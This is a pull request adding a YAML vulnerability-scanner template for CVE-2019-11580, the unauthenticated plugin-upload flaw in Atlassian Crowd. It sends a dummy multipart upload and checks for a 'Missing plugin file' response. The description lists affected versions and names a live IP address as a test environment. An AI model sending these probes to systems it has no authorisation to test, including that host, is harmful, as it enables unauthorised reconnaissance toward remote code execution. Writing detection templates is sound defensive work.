### PR TITLE
增加 poc CVE-2019-11580

### DIFF
--- a/pocs/AtlassianCrowd-RCE-CVE-2019-11580.yml
+++ b/pocs/AtlassianCrowd-RCE-CVE-2019-11580.yml
@@ -1,4 +1,4 @@
-name: poc-yaml-AtlassianCrowd-RCE-CVE-2019-11580.yml
+name: poc-yaml-AtlassianCrowd-RCE-CVE-2019-11580
 rules:
   - method: POST
     path: /crowd/admin/uploadplugin.action

--- a/pocs/AtlassianCrowd-RCE-CVE-2019-11580.yml
+++ b/pocs/AtlassianCrowd-RCE-CVE-2019-11580.yml
@@ -1,0 +1,22 @@
+name: poc-yaml-AtlassianCrowd-RCE-CVE-2019-11580.yml
+rules:
+  - method: POST
+    path: /crowd/admin/uploadplugin.action
+    headers:
+      Content-Type: >-
+        multipart/form-data;boundary=--------------------------030909570995894093305230
+    body: |-
+      ----------------------------030909570995894093305230
+      Content-Disposition: form-data; name=""; filename="abcde.jar"
+      Content-Type: application/java-archive
+
+      123
+      ----------------------------030909570995894093305230--
+    follow_redirects: false
+    expression: >
+      response.status == 400 &&response.body.bcontains(bytes("Missing plugin file"))
+detail:
+  author: su(https://suzzz112113.github.io/#blog)
+  links:
+    -  https://blog.csdn.net/caiqiiqi/article/details/96285653
+    -  https://confluence.atlassian.com/crowd/crowd-security-advisory-2019-05-22-970260700.html


### PR DESCRIPTION
增加 poc CVE-2019-11580

## 本 poc 是检测什么漏洞的
poc是用来检测Atlassion Crowd未授权任意上传插件，导致RCE的。

## 测试环境
https://118.89.51.162:8843
## 备注
  受影响的产品及版本包括：Atlassian Crowd 2.1.x版本，3.0.5之前的3.0.x版本，3.1.6之前的3.1.x版本，3.2.8之前的3.2.x版本，3.3.5之前的3.3.x版本，3.4.4之前的3.4.版本；Atlassian Crowd Data Center 2.1.x版本，3.0.5之前的3.0.x版本，3.1.6之前的3.1.x版本，3.2.8之前的3.2.x版本，3.3.5之前的3.3.x版本，3.4.4之前的3.4.版本。
![image](https://user-images.githubusercontent.com/26242452/90587830-e3598080-e20c-11ea-9aec-823da23b76fc.png)
